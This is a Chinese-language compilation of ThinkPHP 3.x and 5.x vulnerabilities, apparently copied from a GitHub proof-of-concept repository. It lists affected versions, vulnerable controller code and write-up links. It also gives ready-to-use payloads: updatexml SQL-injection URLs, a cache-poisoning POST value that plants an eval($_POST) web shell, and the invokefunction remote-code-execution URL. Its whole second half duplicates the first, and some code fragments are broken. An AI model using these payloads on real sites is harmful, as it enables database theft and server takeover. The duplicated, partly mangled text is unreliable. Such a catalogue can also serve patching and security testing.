https://github.com/pochubs/pochubs/blob/master/ThinkPHP.md tp 历史漏洞
路由控制類RCE
/think/App.php
if (!preg_match('/^[A-Za-z](w|.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }
變量覆蓋RCE
/think/Request.php
if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) { $this->method = $method; $this->{$this->method}($_POST);
SQL:
1.
漏洞影响版本: 5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。
$username = request()->get('username/a'); db('users')->insert(['username' => $username]);
2.
5.1.6<=ThinkPHP<=5.1.7 (非最新的 5.1.8 版本也可利用)。
$username = request()->get('username/a'); db('users')->where(['id' => 1])->update(['username' => $username]); return 'Update success';
3.
ThinkPHP 中存在的 SQL注入 漏洞( select 方法注入)。ThinkPHP5全版本 。
$username = request()->get('username'); $result = db('users')->where('username','exp',$username)->select(); return 'select success
';
4.。漏洞影响版本: ThinkPHP=5.0.10 。
漏洞环境
$username = request()->get('username/a'); $result = db('users')->where(['username' => $username])->select(); var_dump($result);
5.
漏洞影响版本: 5.1.16<=ThinkPHP5<=5.1.22 。
$orderby = request()->get('orderby'); $result = db('users')->where(['username' => 'mochazz'])->order($orderby)->find();
6.
漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 。
$options = request()->get('options'); $result = db('users')->max($options); var_dump($result);
文件包含
5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10。
public function index() { $this->assign(request()->get()); return $this->fetch();
一、3.x
使用方法
cd /var/www/tp3
ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell
| 标题 | ThinkPHP5.0.10-3.2.3缓存函数设计缺陷可导致Getshell |
|---|---|
| 时间 | 2017-08-09 |
| 版本 | <= 3.2.3 |
| 文章链接 | https://xz.aliyun.com/t/99 |
ThinkPHP3.2.3_最新版update注入漏洞
| 标题 | Thinkphp3.2.3最新版update注入漏洞 |
|---|---|
| 时间 | 2018-04-16 |
| 版本 | <= 3.2.3 |
| 文章链接 | https://www.anquanke.com/post/id/104847 |
ThinkPHP3.2.X_find_select_delete注入
| 标题 | thinkphp3.2 find_select_delete注入 |
|---|---|
| 时间 | 2018-08-23 |
| 版本 | <= 3.2.3 |
| 文章链接 | https://xz.aliyun.com/t/2631 https://xz.aliyun.com/t/2629 |
ThinkPHP3.X_order_by注入漏洞
| 标题 | ThinkPHP 3.X/5.X order by注入漏洞 |
|---|---|
| 时间 | 2018-08-29 |
| 版本 | <= 3.2.3 |
| 文章链接 | https://mp.weixin.qq.com/s/jDvOif0OByWkUNLv0CAs7w |
二、5.x
使用方法
cd /var/www/tp5
ThinkPHP5_SQL注入漏洞&&敏感信息泄露
| 标题 | ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 |
|---|---|
| 时间 | 2017-07-03 |
| 版本 | < 5.0.9 |
| 文章链接 | https://xz.aliyun.com/t/125 https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html |
测试方法
git checkout 02f8e8a测试代码
public function testsql() { $ids = input('ids/a'); $result = db('user')->where('id', 'in', $ids)->select(); var_dump($result); }POC
testsql?ids[0,updatexml(0,concat(0xa,user()),0)]=1231结果
ThinkPHP5.0.10-3.2.3_缓存函数设计缺陷可导致Getshell
| 标题 | ThinkPHP5.0.10-3.2.3 缓存函数设计缺陷可导致Getshell |
|---|---|
| 时间 | 2017-08-09 |
| 版本 | < 5.0.11 |
| 文章链接 | https://xz.aliyun.com/t/99 |
测试方法
git checkout 094dde5测试代码
public function add() { $user = input('post.'); $m=db('user')->where(['id'=> 1])->insert($user); } public function cache() { $m = db('user')->select(); Cache::set('name',$m,3600); }POC
post data: username=%2F%2F%0D%0A%24a%3Deval(%24_POST%5B%27a%27%5D)%3B%23 注:%2F%2F%0D%0A = //+回车结果
其中文件路径和名称是 b0+68931cc450442b63f5b3d276ea4297 而
md5('name') = b068931cc450442b63f5b3d276ea4297
ThinkPHP框架5.0.X_sql注入漏洞分析
| 标题 | ThinkPHP框架 5.0.x sql注入漏洞分析 |
|---|---|
| 时间 | 2018-04-09 |
| 版本 | < 5.0.16 |
| 文章链接 | https://xz.aliyun.com/t/2257 |
测试方法
git checkout 7c13757测试代码
public function testsql() { $username = input('get.username/a'); db('user')->where(['id'=> 1])->insert(['username'=>$username]); }POC
testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1结果
ThinkPHP5.X_order_by注入漏洞
| 标题 | ThinkPHP 3.X/5.X order by注入漏洞 |
|---|---|
| 时间 | 2018-08-23 |
| 版本 | <= 5.1.22 |
| 文章链接 | https://mp.weixin.qq.com/s/jDvOif0OByWkUNLv0CAs7w |
测试方法
git checkout 35e9878测试代码
public function testsql() { $order = input('get.order'); $m = db('user')->order($order)->find(); var_dump($m); }POC
testsql?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1结果
ThinkPHP5.X_远程代码执行
| 标题 | ThinkPHP5.X 远程代码执行 |
|---|---|
| 时间 | 2018-12-10 |
| 版本 | 5.0.5-5.0.22 5.1.0-5.1.30 |
| 文章链接 | https://xz.aliyun.com/t/3570 https://paper.seebug.org/760/ https://paper.seebug.org/770 |
测试方法
git checkout 4fefa5e测试代码
public function index() { //...无需实际代码 }POC
index?s=index/ hinkcontainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1结果
一、3.x
使用方法
cd /var/www/tp3
ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell
| 标题 | ThinkPHP5.0.10-3.2.3缓存函数设计缺陷可导致Getshell |
|---|---|
| 时间 | 2017-08-09 |
| 版本 | <= 3.2.3 |
| 文章链接 | https://xz.aliyun.com/t/99 |
ThinkPHP3.2.3_最新版update注入漏洞
| 标题 | Thinkphp3.2.3最新版update注入漏洞 |
|---|---|
| 时间 | 2018-04-16 |
| 版本 | <= 3.2.3 |
| 文章链接 | https://www.anquanke.com/post/id/104847 |
ThinkPHP3.2.X_find_select_delete注入
| 标题 | thinkphp3.2 find_select_delete注入 |
|---|---|
| 时间 | 2018-08-23 |
| 版本 | <= 3.2.3 |
| 文章链接 | https://xz.aliyun.com/t/2631 https://xz.aliyun.com/t/2629 |
ThinkPHP3.X_order_by注入漏洞
| 标题 | ThinkPHP 3.X/5.X order by注入漏洞 |
|---|---|
| 时间 | 2018-08-29 |
| 版本 | <= 3.2.3 |
| 文章链接 | https://mp.weixin.qq.com/s/jDvOif0OByWkUNLv0CAs7w |
二、5.x
使用方法
cd /var/www/tp5
ThinkPHP5_SQL注入漏洞&&敏感信息泄露
| 标题 | ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 |
|---|---|
| 时间 | 2017-07-03 |
| 版本 | < 5.0.9 |
| 文章链接 | https://xz.aliyun.com/t/125 https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html |
测试方法
git checkout 02f8e8a测试代码
public function testsql() { $ids = input('ids/a'); $result = db('user')->where('id', 'in', $ids)->select(); var_dump($result); }POC
testsql?ids[0,updatexml(0,concat(0xa,user()),0)]=1231结果
ThinkPHP5.0.10-3.2.3_缓存函数设计缺陷可导致Getshell
| 标题 | ThinkPHP5.0.10-3.2.3 缓存函数设计缺陷可导致Getshell |
|---|---|
| 时间 | 2017-08-09 |
| 版本 | < 5.0.11 |
| 文章链接 | https://xz.aliyun.com/t/99 |
测试方法
git checkout 094dde5测试代码
public function add() { $user = input('post.'); $m=db('user')->where(['id'=> 1])->insert($user); } public function cache() { $m = db('user')->select(); Cache::set('name',$m,3600); }POC
post data: username=%2F%2F%0D%0A%24a%3Deval(%24_POST%5B%27a%27%5D)%3B%23 注:%2F%2F%0D%0A = //+回车结果
其中文件路径和名称是 b0+68931cc450442b63f5b3d276ea4297 而
md5('name') = b068931cc450442b63f5b3d276ea4297
ThinkPHP框架5.0.X_sql注入漏洞分析
| 标题 | ThinkPHP框架 5.0.x sql注入漏洞分析 |
|---|---|
| 时间 | 2018-04-09 |
| 版本 | < 5.0.16 |
| 文章链接 | https://xz.aliyun.com/t/2257 |
测试方法
git checkout 7c13757测试代码
public function testsql() { $username = input('get.username/a'); db('user')->where(['id'=> 1])->insert(['username'=>$username]); }POC
testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1结果
ThinkPHP5.X_order_by注入漏洞
| 标题 | ThinkPHP 3.X/5.X order by注入漏洞 |
|---|---|
| 时间 | 2018-08-23 |
| 版本 | <= 5.1.22 |
| 文章链接 | https://mp.weixin.qq.com/s/jDvOif0OByWkUNLv0CAs7w |
测试方法
git checkout 35e9878测试代码
public function testsql() { $order = input('get.order'); $m = db('user')->order($order)->find(); var_dump($m); }POC
testsql?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1结果
ThinkPHP5.X_远程代码执行
| 标题 | ThinkPHP5.X 远程代码执行 |
|---|---|
| 时间 | 2018-12-10 |
| 版本 | 5.0.5-5.0.22 5.1.0-5.1.30 |
| 文章链接 | https://xz.aliyun.com/t/3570 https://paper.seebug.org/760/ https://paper.seebug.org/770 |
测试方法
git checkout 4fefa5e测试代码
public function index() { //...无需实际代码 }POC
index?s=index/ hinkcontainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1结果